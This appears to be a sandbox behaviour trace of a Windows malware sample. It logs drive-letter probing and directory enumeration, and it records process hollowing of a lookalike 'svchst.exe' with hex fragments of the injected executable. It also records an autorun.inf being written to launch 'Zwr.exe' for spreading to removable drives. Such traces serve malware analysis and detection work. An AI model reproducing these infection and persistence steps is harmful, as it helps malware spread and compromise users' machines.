File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547380537
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547381235
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547383211
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547384203
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547392398
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547393334
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547395222
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547396218
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547399932
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547400548
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402402
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402597
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547402909
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547403600
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407084
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407282
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547407607
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547408035
Process created PID: 1616 Path: C:\WINDOWS\svchst.exe Cmdline: C:\WINDOWS\svchst.exe Createflags: none success or wait 547409500
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547411344
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547412210
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547413744
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547414626
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547423021
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547423748
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547426235
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547428170
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547431057
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547432012
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547434658
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547442607
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547445752
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547445962
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547446269
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547447509
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547451396
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 547451604
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: * success or wait 547456844
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: unknown success or wait 547457441
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: * success or wait 548105655
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: unknown success or wait 548105866
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: * success or wait 548108900
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: unknown success or wait 548109084
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: * success or wait 548110662
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: unknown success or wait 548113095
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: * success or wait 548119586
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown success or wait 548119793
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: * success or wait 548127219
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown success or wait 548127418
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: * success or wait 548129801
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown success or wait 548131758
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: * success or wait 548133313
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown success or wait 548139909
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown no more files 548140063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: * success or wait 548144900
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown success or wait 548145074
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown no more files 548145221
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: * success or wait 548178273
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown success or wait 548178716
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown no more files 548179184
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown no more files 548193334
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown no more files 548208799
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 548228180
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 548228607
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: * success or wait 548260481
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown success or wait 548261516
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: * success or wait 548273410
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown success or wait 548273936
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown no more files 548274308
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown no more files 548306620
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown no more files 548309127
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: * success or wait 548320962
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown success or wait 548330450
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: * success or wait 548350625
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown success or wait 548351052
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: * success or wait 548363063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown success or wait 548363500
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: * success or wait 548379218
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 12FAB0 Allocation Type: unknown Protection: page read and write success or wait 548381940
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown success or wait 548382832
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown no more files 548384496
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 4096 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 548401031
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 426000 Length: 73216 Value: 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 548495964
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: * success or wait 548496966
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown success or wait 548504690
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown no more files 548505536
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 438000 Length: 1024 Value: 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 548531694
Memory written PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 7FFDF008 Length: 4 Value: 00 00 40 00 success or wait 548553274
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: * success or wait 548553443
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown success or wait 548554789
Thread context set TID: 1136 PID: 1616 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 0 EFLAGS: 0 Imagepath: null success or wait 548565596
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown no more files 548565787
Thread resumed TID: 1136 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 548566651
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown no more files 548571436
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown no more files 548579211
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown no more files 548595989
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown no more files 548603393
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: * success or wait 548614672
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown success or wait 548615091
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: * success or wait 548622622
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown success or wait 548623282
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown no more files 548623616
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown no more files 548634862
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: * success or wait 548642865
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: unknown success or wait 548643064
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 548651485
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 548652342
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: * success or wait 548670690
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: unknown success or wait 548672602
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: * success or wait 548678812
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown success or wait 548693881
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown no more files 548707042
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: unknown no more files 548723454
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.comDisposition: BothDirectoryInformation Filemask: * success or wait 548747828
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.comDisposition: BothDirectoryInformation Filemask: unknown success or wait 548750177
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\supportDisposition: BothDirectoryInformation Filemask: * success or wait 548756203
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\supportDisposition: BothDirectoryInformation Filemask: unknown success or wait 548756932
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayerDisposition: BothDirectoryInformation Filemask: * success or wait 548768020
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 548768636
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sysDisposition: BothDirectoryInformation Filemask: * success or wait 548771353
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sysDisposition: BothDirectoryInformation Filemask: unknown success or wait 548772234
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sysDisposition: BothDirectoryInformation Filemask: unknown no more files 548775664
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayerDisposition: BothDirectoryInformation Filemask: unknown no more files 548778784
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\supportDisposition: BothDirectoryInformation Filemask: unknown no more files 548788175
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.comDisposition: BothDirectoryInformation Filemask: unknown no more files 548795139
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.comDisposition: BothDirectoryInformation Filemask: * success or wait 548817144
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.comDisposition: BothDirectoryInformation Filemask: unknown success or wait 548818850
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\binDisposition: BothDirectoryInformation Filemask: * success or wait 548831850
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\binDisposition: BothDirectoryInformation Filemask: unknown success or wait 548832338
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateaxDisposition: BothDirectoryInformation Filemask: * success or wait 548840551
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateaxDisposition: BothDirectoryInformation Filemask: unknown success or wait 548841190
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateaxDisposition: BothDirectoryInformation Filemask: unknown no more files 548841552
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\binDisposition: BothDirectoryInformation Filemask: unknown no more files 548851630
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.comDisposition: BothDirectoryInformation Filemask: unknown no more files 548856845
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown no more files 548860105
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: unknown no more files 548871363
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MicrosoftDisposition: BothDirectoryInformation Filemask: * success or wait 548877826
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MicrosoftDisposition: BothDirectoryInformation Filemask: unknown success or wait 548878595
File created Path: c:\autorun.inf Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: true success or wait 976940839
File write Path: C:\autorun.inf Offset: unknown Length: 23 Value: 5b 61 75 74 6f 72 75 6e 5d 0d 0a 6f 70 65 6e 3d 5a 77 72 2e 65 78 65 success or wait 976975759
File opened Path: c:\autorun.inf Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 976977794
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976982348
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976983095
File created Path: D:\ Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true access denied 976983813
File deleted Path: C:\autorun.inf New path: Disposition: Data : success or wait 976985898
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976987994
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976988709
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976989674
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976990265
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976991209
File opened Path: G: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976991799
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976992799
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976993426
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976994406
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976994995
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976995939
File opened Path: H: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976996528
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976997472
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976998055
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976998997
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 976999580
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977000521
File opened Path: I: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977001105
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977002045
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977002630
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977003666
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977004251
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977005193
File opened Path: J: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977005780
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977006724
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977007313
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977008256
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977008842
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977009783
File opened Path: K: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977010369
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977011312
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977011901
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977012902
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977013496
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977014440
File opened Path: L: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977015026
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977015967
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977016556
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977018070
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977018662
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977019605
File opened Path: M: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977020193
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977021226
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977021950
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977022899
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977023484
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977024427
File opened Path: N: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977025014
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977025957
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977026550
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977027495
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977028085
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977029031
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977029824
